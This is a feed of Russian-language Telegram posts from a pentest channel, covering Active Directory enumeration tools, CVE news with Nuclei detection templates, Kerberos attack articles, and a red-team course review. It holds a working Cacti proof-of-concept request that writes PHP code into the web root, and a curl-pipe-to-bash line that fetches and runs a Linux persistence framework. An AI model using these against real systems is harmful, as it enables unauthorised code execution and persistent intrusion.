Отличный инструмент для проведения enumeration в
UPD. Добавили поддержку Windows 2025
Представлен в 2х вариантах, стандарт и лайт
Полная версия имеет встроенный модуль SharpHound для сбора информации в
Стандартный запуск:
Import-Module .\adPEAS.ps1
Invoke-adPEAS
Доступные модули:
Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках
Rights - поиск различных прав, например LAPS, DCSync и т.д.
GPO - базовая информация о групповых политиках
ADCS - информация о центрах сертификации
Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.
Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей
Accounts - информация об аккаунтах
Computer - AD DS, AD CS, Exchange серверы и т.д.
BloodHound - сборщик данных для BH
Варианты запуска:
Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'
Определенная УЗ:
$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)
Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred
Модули:
Invoke-adPEAS -Module Domain
Invoke-adPEAS -Module Rights
Invoke-adPEAS -Module GPO
Invoke-adPEAS -Module ADCS
Invoke-adPEAS -Module Creds
Invoke-adPEAS -Module Delegation
Invoke-adPEAS -Module Accounts
Invoke-adPEAS -Module Computer
Invoke-adPEAS -Module Bloodhound -Scope All
#soft #powershell #activedirectory #enumeration
Please open Telegram to view this post
VIEW IN TELEGRAM
Arbitrary File Creation leading to RCE
Позволяет аутентифицированному пользователю злоупотребить функциями создания графов и шаблонов графов для записи произвольных PHP-скриптов в корень сайта
PoC:
POST http://192.168.178.78/cacti/graph_templates.php?header=false HTTP/1.1
host: 192.168.178.78
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 804
Origin: http://192.168.178.78
Connection: keep-alive
Referer: http://192.168.178.78/cacti/graph_templates.php?action=template_edit&id=297&csrf_timeout=true&csrf_timeout=true
Cookie: CactiDateTime=Fri Jan 03 2025 14:03:51 GMT+0000 (Greenwich Mean Time); CactiTimeZone=0; Cacti=r378gdiav394djct96o26mliud; cacti_remembers=1%2C0%2C1ac46cea6e1f0225f6e52320b4d734503fac5215a76879b3cb2c939d5cc56c49
Priority: u=0
__csrf_magic=sid%3A3363ef9d47d62372302b4941b790e92f5f749d9c%2C1735913031&name=PING+-+Advanced+Ping&graph_template_id=297&graph_template_graph_id=297&save_component_template=1&title=%7Chost_description%7C+-+Advanced+Ping&vertical_label=milliseconds&image_format_id=3&height=200&width=700&base_value=1000&slope_mode=on&auto_scale_opts=1&upper_limit=10&lower_limit=0&unit_value=&unit_exponent_value=1&unit_length=&right_axis=&right_axis_label=XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A&right_axis_format=0&right_axis_formatter=0&left_axis_formatter=0&tab_width=30&legend_position=0&legend_direction=0&rrdtool_version=1.7.2&action=save
#web #rce #cacti #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
JSON Web Token - специальный формат токена, который позволяет безопасно(в идеале 😁) передавать данные между клиентом и сервером.
Состоит из трёх частей: заголовок, пейлоад и подпись
Пример простейшей реализации на Python
import json
import hmac
import hashlib
import base64
import uuid
header = {"typ": "JWT", "alg": "HS256"}
payload = {"name": "exited3n", "isAdmin": True}
secret = str(uuid.uuid4())
def jwt_gen(header: dict, payload: dict, secret: str) -> bytes:
jwt_parts = []
json_header = json.dumps(header).encode()
json_payload = json.dumps(payload).encode()
jwt_parts.append(base64.urlsafe_b64encode(json_header))
jwt_parts.append(base64.urlsafe_b64encode(json_payload))
merge_payload_header = b'.'.join(jwt_parts)
signature = hmac.new(secret.encode(), merge_payload_header, hashlib.sha256).digest()
jwt_parts.append(base64.urlsafe_b64encode(signature))
return b'.'.join(jwt_parts)
print(f'Secret: {secret}')
print(jwt_gen(header, payload, secret))
#jwt #token #flask #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Обновление отличного кроссплатформенного инструмента для визуализации, построения графов, связей и исследования Active Directory.
Даст мгновенные результаты, показывая, какие разрешения имеют пользователи и группы в
Проект активно развивается. Написан на
Отличия от
Не требуется Neo4J, Python
Не требуется предварительной настройки
Для построения запросов используется расширенный LDAP синтаксис
Наличие бесплатной и коммерческой версии
Машина в домене:
adalanche.exe collect activedirectory
Машина не в домене:
adalanche.exe collect activedirectory --ignorecert --domain contoso.local --authdomain CONTOSO --username dom_user --password P@ssw0rd
Будет создана папка
dataАнализ:
adalanche.exe analyze
#adalanche #golang #soft #activedirectory
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1👍1
MAP | Kaspersky Cyberthreat live map
Find out if you’re under cyber-attack here #CyberSecurityMap #CyberSecurity
Небольшая подборка онлайн карт кибер угроз
#security #maps #threats
Please open Telegram to view this post
VIEW IN TELEGRAM
Обновление открытого шестнадцатеричного редактора для работы в
ImHex содержит всевозможные инструменты и функции, такие как средство просмотра энтропии и встроенный интерфейс для дизассемблера Capstone
Имеет пользовательский язык шаблонов, используемый для определения структур и типов данных, который обеспечивает автоматический анализ файлов и аннотацию
Написан на
#imhex #soft #cplusplus
Please open Telegram to view this post
VIEW IN TELEGRAM
В далеком 2014 году зарегистрировал аккаунт в данном сервисе, сколько там сохранено записей трудно даже представить, а теперь и не узнать вовсе.
Вчера вечером не получилось войти с валидными кредами и я попробовал зарегистрировать новый аккаунт на свой же
Знаю, что их несколько раз удачно "пентестили" 😂 И предпосылки сменить данный сервис имелись, но как всегда было лень и не доходили руки, теперь дошли.
Сказать что я чуть [цензура], ничего не сказать, доверие к подобным сервисам упало до нуля и было принято волевое решение использовать -
Благо с памятью у меня все в порядке и почти все необходимое помню наизусть, что не вспомню, буду восстанавливать.
Ну а вы друзья, товарищи, чем подобным пользуетесь ?
#keepassxc #passwords
Please open Telegram to view this post
VIEW IN TELEGRAM
Нашел отличный и удобный инструмент, предназначенный для поиска эксплоитов, известных уязвимостей и их эксплуатации с поддержкой
Установка в
sudo apt install sploitscan
В репозиториях не самая новая версия, поэтому рекомендую ставить с гитхаба.
git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt
PyPi:
pip install --user sploitscan
Источники PoC'ов:
➡️ GitHub➡️ ExploitDB➡️ VulnCheck (нужен free API key)➡️ Packet Storm➡️ Nuclei
Импорт из:
Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)
В конфиге указываем API ключи поддерживаемых сервисов (config.json)
{
"vulncheck_api_key": "",
"openai_api_key": "",
"google_api_key": "",
"grok_api_key": "",
"deepseek_api_key": ""
}Поиск по CVE:
sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413
Поиск по ключевым словам:
sploitscan -k "Outlook Express"
Импорт и экспорт:
sploitscan --import-file path/to/yourfile.nessus --type nessus
sploitscan CVE-2024-1709 -e {json,csv,html}
Помощь AI:
sploitscan --ai openai CVE-2024-21413
┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...
| 2. Potential Attack Scenarios
| ------------------------------
| ...
| 3. Mitigation Recommendations
| ------------------------------
| ...
| 4. Executive Summary
| ---------------------
| ...
#sploitscan #poc #cve #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Конечно, тут далеко не всё, с чем приходится иметь дело, но базовые утилиты и инструменты я постарался указать. Пишите в комментарии свои любимые инструменты и сервисы.
#soft #kit #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
Мощный, модульный и легко настраиваемый framework для закрепления в
Запуск:
curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh | bash
#soft #shell #linux #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
HADESS
The Art Of Linux Persistence - HADESS
Account Creation in Linux Linux operating system can usually have two types of account “Root” and “User” account. There are two usually two ways to manipulate the Accounts to maintain the persistence access to the machine : User Account Creation If we (attacker)…
#linux #persistence #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Невероятно подробная шпаргалка по пентесту AD инфраструктуры. Лучше не встречал. Рекомендую!
АХТУНГ! Огромное разрешение 19148x7303
#activedirectory #pentest #cheatsheet #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
Очередная уязвимость в популярном JS фреймворке
Next.js использует хедер x-middleware-subrequest, для предотвращения рекурсивных запросов
Уязвимость позволяет обойти проверки авторизации, выполняемые в промежуточном программном обеспечении Next.js, что потенциально позволяет злоумышленникам получить доступ к конфиденциальным данным
Недостаток устранен в версиях 12.3.5, 13.5.9, 14.2.25 и 15.2.3
Подробный разбор (на англ.)
id: nextjs-CVE-2025-29927
info:
name: Next.js - CVE-2025-29927
author: 6mile
severity: critical
description: |
Next.js has a critical vulnerability that allows attackers to bypass authentication entirely when the application utilizes middleware for authorization.
reference:
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
- https://nvd.nist.gov/vuln/detail/CVE-2025-29927
- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
- https://zeropath.com/blog/nextjs-middleware-cve-2025-29927-auth-bypass
metadata:
verified: true
vendor: vercel
product: next.js
framework: node.js
shodan-query:
- http.html:"/_next/static"
- x-powered-by: next.js
- x-nextjs-cache:
- cpe:"cpe:2.3:a:zeit:next.js"
fofa-query: body="/_next/static"
tags: nextjs,cve-2025-29927
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
name: Next.js
part: header
words:
- 'x-nextjs-cache:'
- 'x-powered-by: next.js'
- 'x-nextjs-prerender:'
- 'x-nextjs-stale-time:'
- 'set-cookie: NEXT_LOCALE='
condition: or
case-insensitive: true
- type: word
name: Next.js Middleware
part: header
words:
- 'x-middleware-rewrite:'
- 'x-middleware-set-cookie:'
condition: or
case-insensitive: true
- type: status
status:
- 200
#web #pentest #nextjs #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
wiz.io
CVE-2025-1974: The IngressNightmare in Kubernetes | Wiz Blog
Wiz Research uncovered RCE vulnerabilities (CVE-2025-1097, 1098, 24514, 1974) in Ingress NGINX for Kubernetes allowing cluster-wide secret access.
Wiz Research обнаружила CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 и CVE-2025-1974, серию RCE в контроллере Ingress NGINX для Kubernetes, получившем название IngressNightmare. Использование этих уязвимостей приводит к несанкционированному доступу злоумышленников к чувствительным данным, хранящимся во всех namespace'ах кластера Kubernetes, что может привести к его захвату.
Nuclei шаблон для проверки:
id: exposed-ingress-nginx-admission
info:
name: Publicly exposed Ingress NGINX Admission
author: Wiz research
severity: high
description: Ingress Nginx admission controller endpoint should not be exposed
metadata:
max-request: 1
tags: ssl,tls
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
- type: dsl
dsl:
- 'contains(issuer_org, "nil1")'
- 'contains(subject_org, "nil2")'
- 'contains(subject_an, "nginx")'
condition: and
extractors:
- type: json
name: issuer_org
json:
- ".issuer_org[0]"
- type: json
name: subject_org
json:
- ".subject_org[0]"
- type: json
name: subject_an
json:
- ".subject_an[0]"
Подробнее (на англ.)
#nginx #ingress #cve #kubernetes
Please open Telegram to view this post
VIEW IN TELEGRAM
Веб-приложение с открытым исходным кодом, которое помогает генерировать обфусцированные команды для
#windows #obfuscator #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
iximiuz Labs
Challenges 🏆 | iximiuz Labs
Practical DevOps problems for all skill levels and interests
Практические задания, направленные на развитие ваших навыков в области
В разделе с контейнерами 75 задач и 43 для кубика.
Задания рассчитаны как на новичков, так и на опытных специалистов.
Похоже на Сodewars, но для DevOps
Примеры некоторых заданий:
▪️ Run a Container in Background, Read Logs, and Attach▪️ Install and Configure containerd on a Linux Host▪️ Build a Production-Ready Node.js Container Image: Nuxt Application▪️ Classic Sysadmin Task: Which Process Is Listening on a Port?▪️ Make a Kubernetes Pod Survive an OOM Event Without Restarting
#devops #training #docker #kubernetes
Please open Telegram to view this post
VIEW IN TELEGRAM
Большая подборка поисковиков, которые будут полезны ИТ специалистам, поиск по различным устройствам, эксплоитам, уязвимостям, исходным кодам и т.д.
Постоянно пользуюсь сам:
#search #security #servers #exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Lares Labs
Kerberos I - Overview
This post, is the first in the series and will aim to provide an overview of the protocol, from its beginnings to the different (ab)use techniques.
Серия публикаций о протоколе Kerberos, начиная с основ и до различных методов эксплуатации. Весь материал представлен на английском языке.
Software:
#kerberos #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Lares Labs
Kerberos III - User Impersonation
The goal of this post, whether we are adversaries or defenders, is to help us understand the multiple ways that Kerberos offers to access resources using the credential material gathered.
Серия публикаций о протоколе Kerberos, начиная с основ и до различных методов эксплуатации. Весь материал представлен на английском языке.
Software:
#kerberos #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Lares Labs
Kerberos IV - Delegations
In the third part of this Kerberos series, we focused on leveraging user credential material for impersonation through techniques such as Pass-the-Key/Ticket/Cache/Certificate, and Shadow Credentials. Additionally, we explored how to manage and forge Kerberos…
Заключительная, 4 часть из серии публикаций о протоколе Kerberos, начиная с основ и до различных методов эксплуатации. Весь материал представлен на английском языке.
Software:
#kerberos #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Недавно закончил обучение на курсе
Далее мое сугубо индивидуальное мнение
На формирование итогового мнения о курсе влияет большое количество факторов:
▪️ количество времени, которое вы готовы уделять курсу
▪️ уровень ваших знаний по теме курса в момент его старта
▪️ уровень ваших знаний по смежным темам и т.д.
Причины выбора курса:
1. Авторский/кураторский состав
Думаю, что решающим фактором записаться на курс в первом потоке конкретно для меня была строка в одном из рекламных сообщений: "Первые два потока кураторами курса являются его авторы"
Там он и рассказал, что является Red и Purple тимлидом. В интервью, которое он давал перед стартом курса, он подтверждает это. Канал Павла
2. Отсутствие аналогов в 🇷🇺 РФ
Этот тезис был одним из рекламных слоганов. Я думаю, что каждый, кто обучается или обучался на курсах по ИБ примерно представляет себе, как выглядит рынок этих курсов в России. И думаю многие понимают, что это правда.
В русскоязычном сегменте, из известных мне курсов по внутрянке, есть лишь ещё курс по тестированию инфраструктуры от CyberEd. Но он не сосредоточен только на AD. Он также затрагивает темы тестирования инфраструктуры в Linux. Так что данный курс действительно уникальный в данном сегменте.
Курс затрагивает очень большое количество тем.
Начинается с базовых теоретических понятий: объект, лес, домен и т.д.
Далее идет блок, связанный с пентестом
Блок про туннелирование
А потом начинается AD - kerberos, делегирование, уязвимые ACL, ретрансляционные атаки, тестирование
Не смотря на то, что в большинстве своем методички составлены прекрасно, главное преимущество курса, это конечно же, практические лабораторные к каждому уроку. 16 больших стендов для отработки всего изученного материала и экзаменационный стенд.
Количество хостов в домене по мере движения по курсу растет. Количество техник и методик, которые нужно применять, чтобы скомпрометировать машинку также увеличивается.
В лабах работают боты на почтовых сервисах, которые по разному отвечают в зависимости от контекста. Скрипты, которые запускают службы, позволяя реализовать DLL-hijacking. Все лабы логически и последовательно выстроены.
Большой и сложный экзамен, на решение которого дается 24 часа является отличной проверкой ваших знаний. Только вы, задания и лабораторный стенд.
Огромное спасибо Паше и Мише за разработку отличного курса.
Я почти уверен, что любой, кто самостоятельно сможет пройти данный курс от начала и до конца вполне может претендовать на должность пентестера.
P.S. Для будущих поколений, ребят, курс сложный, рассчитывайте свои навыки, база должна быть приличной. И да прибудет с вами сила!
#active_directory #windows #course #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM